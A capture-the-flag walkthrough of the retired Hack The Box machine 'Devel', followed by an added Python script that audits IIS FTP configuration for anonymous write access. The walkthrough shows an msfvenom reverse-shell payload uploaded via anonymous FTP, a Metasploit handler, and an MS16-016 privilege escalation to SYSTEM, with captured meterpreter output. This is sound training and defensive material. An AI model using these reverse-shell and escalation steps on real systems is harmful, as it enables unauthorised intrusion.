# Devel

# ENUMERATION

```
NMAP
- 21/tcp open ftp syn-ack Microsoft ftpd
- 80/tcp open http syn-ack Microsoft IIS httpd 7.5
```

# EXPLOIT

FTP - anonymous login

```
kali@kali:~/HTB/RETIRED/Devel$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
```

# EXPLOIT - create file

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.x.x.x LPORT=4444 -f aspx > devel_reverse.aspx
```

PUT - introduce a file to the system

```
ftp> put ./devel_reverse.asp
local: ./devel_reverse.asp remote: ./devel_reverse.asp
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
38290 bytes sent in 0.00 secs (186.3071 MB/s)
```

# METASPLOIT - set up handler

```
msf5 payload(windows/meterpreter/reverse_tcp) > use multi/handler
```

- set LHOST to tun0
- set LPORT to 4444 (or whatever you want)
- run the handler

# WEBPAGE - run the exploit in a browser

http://10.10.10.5/devel_reverse.aspx

- the reverse shell should show up in metasploit

```
[*] Started reverse TCP handler on 10.10.14.27:4444
[*] Sending stage (176195 bytes) to 10.10.10.5
[*] Meterpreter session 2 opened (10.10.14.27:4444 -> 10.10.10.5:49158) at 2020-07-19 23:39:58 -0400
meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows
meterpreter > getuid
Server username: IIS APPPOOL\Web
```

# METASPLOIT - send the session to background so you can use it for other exploits

```
meterpreter > background
```

# ENUMERATION - find ways to privilege escalate

- upload and run WinPEAS.bat

```
MS11-080 patch is NOT installed! (Vulns: XP/SP3,2K3/SP3-afd.sys)
No Instance(s) Available.
MS16-032 patch is NOT installed! (Vulns: 2K8/SP1/2,Vista/SP2,7/SP1-secondary logon)
No Instance(s) Available.
MS11-011 patch is NOT installed! (Vulns: XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP1/2,7/SP0-WmiTraceMessageVa)
No Instance(s) Available.
MS10-59 patch is NOT installed! (Vulns: 2K8,Vista,7/SP0-Chimichurri)
```

- (there were many more exploits in this list)

# METASPLOIT - search for each vulnerability, and try them

```
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > search 16-016
```

- try more than one exploit, but search for more and try them too...
- others failed, but MS16-016 succeeded after a few attempts
- make sure to set a session number for each attempt

```
msf5 exploit(windows/local/ms16_016_webdav) > set session 2
```

# PWND

```
msf5 exploit(windows/local/ms16_016_webdav) > run
[*] Started reverse TCP handler on 10.10.14.27:4444
[*] Launching notepad to host the exploit...
[*] Sending stage (176195 bytes) to 10.10.10.5
[+] Process 3168 launched.
[*] Reflectively injecting the exploit DLL into 3168...
[*] Meterpreter session 3 opened (10.10.14.27:4444 -> 10.10.10.5:49170) at 2020-07-19 23:47:12 -0400
[*] Exploit injected ... injecting payload into 3168...
[*] Done. Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
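The whole foothold above rests on one misconfiguration: the IIS FTP site lets anonymous users log in and write into the web root, so an uploaded .aspx runs as server-side code. As an added example (not part of this write-up), the script below audits an applicationHost.config for that combination; the XML is a constructed sample modelled on IIS's system.ftpServer section, and the element and attribute names are assumed from that schema.

```python
import xml.etree.ElementTree as ET

# Constructed sample modelled on IIS applicationHost.config: FTP authentication sits under
# the <site>'s <ftpServer>, authorization rules under <location path="site name">.
# In IIS FTP rules users="*" means every user and users="?" means the anonymous user.
SAMPLE_CONFIG = """<configuration>
 <system.applicationHost><sites>
  <site name="Default FTP Site" id="2">
   <application path="/"><virtualDirectory path="/" physicalPath="C:\\inetpub\\wwwroot" /></application>
   <ftpServer><security><authentication><anonymousAuthentication enabled="true" /></authentication></security></ftpServer>
  </site>
  <site name="Drop Site" id="3">
   <application path="/"><virtualDirectory path="/" physicalPath="C:\\ftproot" /></application>
   <ftpServer><security><authentication><anonymousAuthentication enabled="true" /></authentication></security></ftpServer>
  </site>
 </sites></system.applicationHost>
 <location path="Default FTP Site"><system.ftpServer><security><authorization>
  <add accessType="Allow" users="*" permissions="Read, Write" />
 </authorization></security></system.ftpServer></location>
 <location path="Drop Site"><system.ftpServer><security><authorization>
  <add accessType="Allow" users="?" permissions="Read" />
  <add accessType="Allow" roles="Uploaders" permissions="Read, Write" />
 </authorization></security></system.ftpServer></location>
</configuration>"""

WEB_ROOTS = ("c:\\inetpub\\wwwroot",)  # IIS default web root; add your own site roots here

def anonymous_write_findings(config_xml, web_roots=WEB_ROOTS):
    """(site, physicalPath, in_webroot) for every FTP site that allows anonymous logins
    and has an Allow rule granting Write to all users (*) or the anonymous user (?)."""
    root = ET.fromstring(config_xml)
    findings = []
    for site in root.iter("site"):
        anon = site.find("ftpServer/security/authentication/anonymousAuthentication")
        if anon is None or anon.get("enabled", "false").lower() != "true":
            continue  # anonymous logins off: an unauthenticated upload is not possible here
        name = site.get("name")
        rules = root.findall(f"location[@path='{name}']/system.ftpServer/security/authorization/add")
        if not any(r.get("accessType") == "Allow" and r.get("users") in ("*", "?")
                   and "write" in r.get("permissions", "").lower() for r in rules):
            continue  # anonymous can log in but cannot write
        vdir = site.find("application/virtualDirectory")
        path = (vdir.get("physicalPath") if vdir is not None else "").rstrip("\\")
        # Writable web root is the Devel pattern: an uploaded .aspx becomes server-side code
        findings.append((name, path, path.lower() in web_roots))
    return findings

if __name__ == "__main__":
    for site, path, in_webroot in anonymous_write_findings(SAMPLE_CONFIG):
        print(f"{site}: anonymous write to {path}" + (" (IIS web root)" if in_webroot else ""))
```

The "Drop Site" entry shows the shape that passes: anonymous users get Read only, and Write is tied to a named role.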